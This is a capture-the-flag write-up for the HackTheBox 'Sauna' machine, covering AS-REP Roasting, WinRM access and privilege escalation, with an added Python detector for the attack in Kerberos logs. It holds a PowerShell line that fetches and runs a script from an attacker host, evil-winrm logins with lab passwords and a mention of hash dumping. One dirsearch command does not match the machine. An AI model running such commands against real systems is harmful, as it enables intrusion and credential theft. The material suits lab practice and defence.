Technology is just a tool. In terms of getting the kids working together and motivating them, the teacher is the most important. <Bill Gates>
03 Jan 2020
Sauna is an easy-difficulty Windows machine from HackTheBox. It requires Active Directory enumeration and a Kerberos attack, and is good practice for ethical hacking and penetration testing skills.
Possible usernames can be found on the website and used in an AS-REP Roasting attack. The attack yields a password hash, and the plaintext password is recovered by an offline brute-force attack. This user's credentials allow WinRM access to the box.
Running WinPEAS reveals a possible privilege escalation (PE) path: the result shows that a user account has been configured to log in automatically, and this user has Windows Remote Management permissions.
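Added detection example, not from this write-up: a defender's check over Windows Security event 4768 (Kerberos TGT requested) records for the two footprints of the attack summarised above, a TGT issued with pre-authentication disabled and RC4 encryption, and one client naming many non-existent principals while trying guessed usernames. The event records are constructed; all account names except fsmith and the field values of the failure records are placeholders.

```python
# Added example (not from the write-up): flag AS-REP Roasting footprints in
# Windows Security event 4768 records. Assumes the events are already parsed
# into dicts whose keys follow the 4768 field names; all records are constructed.
from collections import defaultdict

RC4_HMAC = "0x17"            # etype 23: cheap to crack offline, so roasters ask for it
NO_PREAUTH = "0"             # PreAuthType 0: KDC issued the TGT without pre-auth
UNKNOWN_PRINCIPAL = "0x6"    # KDC_ERR_C_PRINCIPAL_UNKNOWN: the account does not exist

# Constructed sample records: one normal AES logon, one roastable account (fsmith,
# from the write-up), one 4769 service-ticket event that must not match, and a run
# of 4768 failures for non-existent names from a single client (10.10.14.15).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "10.10.10.5",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.10.14.15",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "fsmith", "IpAddress": "10.10.14.15",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
] + [
    {"EventID": 4768, "TargetUserName": name, "IpAddress": "10.10.14.15",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"}
    for name in ("guess01", "guess02", "guess03", "guess04", "guess05")
]

def roastable_tgts(events):
    """Return {account: {client IPs}} for TGTs issued with no pre-auth and RC4."""
    hits = defaultdict(set)
    for e in events:
        if (e["EventID"] == 4768 and e["Status"] == "0x0"
                and e.get("PreAuthType") == NO_PREAUTH
                and e["TicketEncryptionType"].lower() == RC4_HMAC):
            hits[e["TargetUserName"]].add(e["IpAddress"])
    return dict(hits)

def guessing_clients(events, threshold=3):
    """Return {ip: count} for clients whose TGT requests named at least
    `threshold` distinct unknown principals (the footprint of a username wordlist)."""
    unknown = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == UNKNOWN_PRINCIPAL:
            unknown[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}

if __name__ == "__main__":
    print("roastable accounts:", roastable_tgts(SAMPLE_EVENTS))
    print("guessing clients  :", guessing_clients(SAMPLE_EVENTS))
```

An account that legitimately has pre-authentication disabled will also appear in the first result, so treat it as a review list: either re-enable pre-authentication or move the account off RC4.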
Nikto: no vulnerability was found that could be abused to bypass authentication.
1.2) Strategy 1: Check for hidden files/folders on the website
No hidden files or folders were found on this website.
python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://192.168.187.134/ -e php,txt -x 301,302,403,404 --simple-report=mrRobot.dirsearch
nmap -p 389 --script ldap-rootdse sauna.htb
This returned some background information about the domain.
Windows Remote Management (WinRM)
WinRM is a built-in Windows remote management protocol that is enabled by default. evil-winrm was used to connect to the system:
evil-winrm.rb -u fsmith -p Thestrokes23 -i sauna.htb
The user.txt file was found in the Desktop folder.
Hacking Process Part 3 – Windows Privilege Escalation
After gaining initial access to the machine, an svc_loanmgr account was found under the c:\Users folder, but the current account did not have the access rights to read that folder.
Enumerating the environment
No missing software patches for local privilege escalation vulnerabilities were found using the Sherlock.ps1 script:
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
According to the net user result above, this user was a member of the Remote Management Users group. evil-winrm was used again to log in:
/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i sauna.htb
As the svc_loanmgr user was in the NTLM Authentication group, an attempt was made to dump the NTLM hashes using Impacket's secretsdump.py.